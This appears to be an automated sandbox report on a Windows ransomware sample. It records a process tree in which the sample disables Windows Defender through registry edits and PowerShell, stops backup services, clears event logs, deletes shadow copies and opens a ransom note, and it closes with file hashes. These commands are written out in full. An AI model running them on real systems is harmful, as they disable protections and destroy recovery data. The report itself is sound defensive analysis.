description pid Process Token: SeSecurityPrivilege 1508 wevtutil.exe Token: SeBackupPrivilege 1508 wevtutil.exe Token: SeSecurityPrivilege 4700 wevtutil.exe Token: SeBackupPrivilege 4700 wevtutil.exe Token: SeSecurityPrivilege 4856 wevtutil.exe Token: SeBackupPrivilege 4856 wevtutil.exe Token: SeIncreaseQuotaPrivilege 2728 wmic.exe Token: SeSecurityPrivilege 2728 wmic.exe Token: SeTakeOwnershipPrivilege 2728 wmic.exe Token: SeLoadDriverPrivilege 2728 wmic.exe Token: SeSystemProfilePrivilege 2728 wmic.exe Token: SeSystemtimePrivilege 2728 wmic.exe Token: SeProfSingleProcessPrivilege 2728 wmic.exe Token: SeIncBasePriorityPrivilege 2728 wmic.exe Token: SeCreatePagefilePrivilege 2728 wmic.exe Token: SeBackupPrivilege 2728 wmic.exe Token: SeRestorePrivilege 2728 wmic.exe Token: SeShutdownPrivilege 2728 wmic.exe Token: SeDebugPrivilege 2728 wmic.exe Token: SeSystemEnvironmentPrivilege 2728 wmic.exe Token: SeRemoteShutdownPrivilege 2728 wmic.exe Token: SeUndockPrivilege 2728 wmic.exe Token: SeManageVolumePrivilege 2728 wmic.exe Token: 33 2728 wmic.exe Token: 34 2728 wmic.exe Token: 35 2728 wmic.exe Token: 36 2728 wmic.exe Token: SeIncreaseQuotaPrivilege 1720 wmic.exe Token: SeSecurityPrivilege 1720 wmic.exe Token: SeTakeOwnershipPrivilege 1720 wmic.exe Token: SeLoadDriverPrivilege 1720 wmic.exe Token: SeSystemProfilePrivilege 1720 wmic.exe Token: SeSystemtimePrivilege 1720 wmic.exe Token: SeProfSingleProcessPrivilege 1720 wmic.exe Token: SeIncBasePriorityPrivilege 1720 wmic.exe Token: SeCreatePagefilePrivilege 1720 wmic.exe Token: SeBackupPrivilege 1720 wmic.exe Token: SeRestorePrivilege 1720 wmic.exe Token: SeShutdownPrivilege 1720 wmic.exe Token: SeDebugPrivilege 1720 wmic.exe Token: SeSystemEnvironmentPrivilege 1720 wmic.exe Token: SeRemoteShutdownPrivilege 1720 wmic.exe Token: SeUndockPrivilege 1720 wmic.exe Token: SeManageVolumePrivilege 1720 wmic.exe Token: 33 1720 wmic.exe Token: 34 1720 wmic.exe Token: 35 1720 wmic.exe Token: 36 1720 wmic.exe Token: SeIncreaseQuotaPrivilege 1720 wmic.exe Token: SeSecurityPrivilege 1720 wmic.exe Token: SeTakeOwnershipPrivilege 1720 wmic.exe Token: SeLoadDriverPrivilege 1720 wmic.exe Token: SeSystemProfilePrivilege 1720 wmic.exe Token: SeSystemtimePrivilege 1720 wmic.exe Token: SeProfSingleProcessPrivilege 1720 wmic.exe Token: SeIncBasePriorityPrivilege 1720 wmic.exe Token: SeCreatePagefilePrivilege 1720 wmic.exe Token: SeBackupPrivilege 1720 wmic.exe Token: SeRestorePrivilege 1720 wmic.exe Token: SeShutdownPrivilege 1720 wmic.exe Token: SeDebugPrivilege 1720 wmic.exe Token: SeSystemEnvironmentPrivilege 1720 wmic.exe Token: SeRemoteShutdownPrivilege 1720 wmic.exe Token: SeUndockPrivilege 1720 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3884 wrote to memory of 372 3884 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 76 PID 3884 wrote to memory of 372 3884 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 76 PID 3884 wrote to memory of 372 3884 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 76 PID 372 wrote to memory of 4648 372 net.exe 77 PID 372 wrote to memory of 4648 372 net.exe 77 PID 372 wrote to memory of 4648 372 net.exe 77 PID 3884 wrote to memory of 4504 3884 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 204 PID 3884 wrote to memory of 4504 3884 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 204 PID 3884 wrote to memory of 4504 3884 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 204 PID 4504 wrote to memory of 4056 4504 net.exe 78 PID 4504 wrote to memory of 4056 4504 net.exe 78 PID 4504 wrote to memory of 4056 4504 net.exe 78 PID 3884 wrote to memory of 4644 3884 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 202 PID 3884 wrote to memory of 4644 3884 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 202 PID 3884 wrote to memory of 4644 3884 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 202 PID 4644 wrote to memory of 4220 4644 net.exe 201 PID 4644 wrote to memory of 4220 4644 net.exe 201 PID 4644 wrote to memory of 4220 4644 net.exe 201 PID 3884 wrote to memory of 4336 3884 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 80 PID 3884 wrote to memory of 4336 3884 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 80 PID 3884 wrote to memory of 4336 3884 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 80 PID 4336 wrote to memory of 2472 4336 net.exe 199 PID 4336 wrote to memory of 2472 4336 net.exe 199 PID 4336 wrote to memory of 2472 4336 net.exe 199 PID 3884 wrote to memory of 3292 3884 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 198 PID 3884 wrote to memory of 3292 3884 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 198 PID 3884 wrote to memory of 3292 3884 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 198 PID 3292 wrote to memory of 2536 3292 net.exe 81 PID 3292 wrote to memory of 2536 3292 net.exe 81 PID 3292 wrote to memory of 2536 3292 net.exe 81 PID 3884 wrote to memory of 960 3884 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 196 PID 3884 wrote to memory of 960 3884 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 196 PID 3884 wrote to memory of 960 3884 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 196 PID 960 wrote to memory of 4112 960 net.exe 194 PID 960 wrote to memory of 4112 960 net.exe 194 PID 960 wrote to memory of 4112 960 net.exe 194 PID 3884 wrote to memory of 4376 3884 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 193 PID 3884 wrote to memory of 4376 3884 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 193 PID 3884 wrote to memory of 4376 3884 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 193 PID 4376 wrote to memory of 3656 4376 net.exe 191 PID 4376 wrote to memory of 3656 4376 net.exe 191 PID 4376 wrote to memory of 3656 4376 net.exe 191 PID 3884 wrote to memory of 1936 3884 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 101 PID 3884 wrote to memory of 1936 3884 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 101 PID 3884 wrote to memory of 1936 3884 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 101 PID 1936 wrote to memory of 4476 1936 net.exe 124 PID 1936 wrote to memory of 4476 1936 net.exe 124 PID 1936 wrote to memory of 4476 1936 net.exe 124 PID 3884 wrote to memory of 1004 3884 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 85 PID 3884 wrote to memory of 1004 3884 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 85 PID 3884 wrote to memory of 1004 3884 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 85 PID 1004 wrote to memory of 4316 1004 net.exe 84 PID 1004 wrote to memory of 4316 1004 net.exe 84 PID 1004 wrote to memory of 4316 1004 net.exe 84 PID 3884 wrote to memory of 5108 3884 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 97 PID 3884 wrote to memory of 5108 3884 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 97 PID 3884 wrote to memory of 5108 3884 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 97 PID 3884 wrote to memory of 1576 3884 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 86 PID 3884 wrote to memory of 1576 3884 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 86 PID 3884 wrote to memory of 1576 3884 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 86 PID 3884 wrote to memory of 932 3884 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 89 PID 3884 wrote to memory of 932 3884 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 89 PID 3884 wrote to memory of 932 3884 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 89 PID 3884 wrote to memory of 4140 3884 windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe 91 -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe"C:\Users\Admin\AppData\Local\Temp\windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3884 -
C:\Windows\SysWOW64\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:372 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:4648
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4336 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:2472
-
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "UnistoreSvc_156f2" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1004
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "SDRSVC" start= disabled2⤵
- Launches sc.exe
PID:1576
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "SstpSvc" start= disabled2⤵
- Launches sc.exe
PID:932
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "UI0Detect" start= disabled2⤵
- Launches sc.exe
PID:4140
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "VSS" start= disabled2⤵
- Launches sc.exe
PID:3324
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "vmicvss" start= disabled2⤵
- Launches sc.exe
PID:3900
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "SamSs" start= disabled2⤵
- Launches sc.exe
PID:5108
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "wbengine" start= disabled2⤵
- Launches sc.exe
PID:1396
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1936
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "UnistoreSvc_156f2" start= disabled2⤵
- Launches sc.exe
PID:2724
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:3372
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:3836
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:3412
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:3160
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:3952
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:5016
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:3620
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:4808
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:4076
-
-
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl system2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1508
-
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:764
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:4128
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2728
-
-
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl application2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:4856
-
-
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1720
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:364
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:64
-
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:2128
-
-
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl security2⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:4700
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1120
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:628
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:404
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:3776
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:4324
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:4360
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:2668
-
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:812
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:2396
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:3100
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:4728
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:2184
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:3268
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:4524
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:1192
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:396
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:824
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:4284
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:1064
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:4944
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:3244
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:3196
-
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:524
-
-
C:\Windows\SysWOW64\sc.exesc.exe config "WebClient" start= disabled2⤵
- Launches sc.exe
PID:428
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4376
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:960
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "vmicvss" /y2⤵
- Suspicious use of WriteProcessMemory
PID:3292
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4644
-
-
C:\Windows\SysWOW64\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:4504
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:1304
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\windows_25bfec0c3c81ab55cf85a57367c14cc6803a03e2e9b4afd72e7bbca9420fe7c5.exe"2⤵PID:624
-
-
C:\Windows\SysWOW64\notepad.exenotepad.exe C:\EGdu_HOW_TO_DECRYPT.txt2⤵
- Opens file in notepad (likely ransom note)
PID:348
-
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y1⤵PID:4056
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "vmicvss" /y1⤵PID:2536
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "UnistoreSvc_156f2" /y1⤵PID:4316
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "WebClient" /y1⤵PID:4476
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:4476
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true1⤵
- Suspicious behavior: EnumeratesProcesses
PID:1516
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "wbengine" /y1⤵PID:3656
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵
- Modifies registry class
PID:3776
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "VSS" /y1⤵PID:4112
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y1⤵PID:4220
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true1⤵
- Suspicious behavior: EnumeratesProcesses
PID:4208
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" F:\EGdu_HOW_TO_DECRYPT.txt1⤵PID:1704
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:4696
-
C:\Windows\SysWOW64\PING.EXEping.exe -n 5 127.0.0.11⤵
- Runs ping.exe
PID:4576
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD54e68cfad3f3cbef5406c90fd9e9d7931
SHA1504d53957bbed8e1a612c791eec7abdd17bd15bc
SHA25651dc299391f9b3eca411936a0d01781ad68799d282655e0d20c8c8521aa8e014
SHA51278c89847c3a7c128e5d54c3fff0e41c89a61722730b9d02d9c7e0b6985ce8188c3c37b6357a71c30f7e34c8b78f94599a186be6c189e56f6ccb832033e77172a
-
Filesize
2KB
MD51c19c16e21c97ed42d5beabc93391fc5
SHA18ad83f8e0b3acf8dfbbf87931e41f0d664c4df68
SHA2561bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05
SHA5127d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c
-
Filesize
18KB
MD55a0fe69e2f15982bf4544203934c8454
SHA197e318e48b3b0ed91c51eb85a5ecad9fa13cf518
SHA25631b7197497c6dd987c344b08705ecf7cae0070644ac8921cf424151acee41630
SHA5123bfe5e2a0b33c137c368a808bef1a051c608a8e400773fe2c8cadd7d56bfd01431892f2a5bb34b9e6a4f39e64829529a05d8b4c872f720479dd1148e9350ff13
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
382.8MB
MD5551d370e790557f39a7acb9601617add
SHA14fc95d6d2e99bdb8541a7c6dcf2f6af185aaefba
SHA2569ed463e29e1a33c09ae2de26be4290b2b4347b66b7a9efdb3f509ea89f71cdd6
SHA51269a7e21ead00b8081ce6b6ef19574f8e94a06331fc73fd9d673cdbc1f5ee80e270e5e4cb553fe6183be2da2cff61b2fcb49da22529de51797f41dbe5e6409a1f